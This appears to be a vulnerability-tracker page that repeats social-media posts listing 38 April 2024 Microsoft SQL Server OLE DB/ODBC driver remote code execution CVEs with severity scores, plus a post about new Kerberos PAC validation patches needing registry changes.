  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28945
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:37

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29048
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:37

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29056
(4.3 MEDIUM)

EPSS: 0.07%

updated 2024-04-09T18:30:36

2 posts

Windows Authentication Elevation of Privilege Vulnerability

mick_talbott at 2024-04-19T00:24:21.401Z ##

Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.

Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).

For more details see:
support.microsoft.com/en-us/to

##

mick_talbott@infosec.exchange at 2024-04-19T00:24:21.000Z ##

Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.

Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).

For more details see:
support.microsoft.com/en-us/to

##

CVE-2024-28932
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
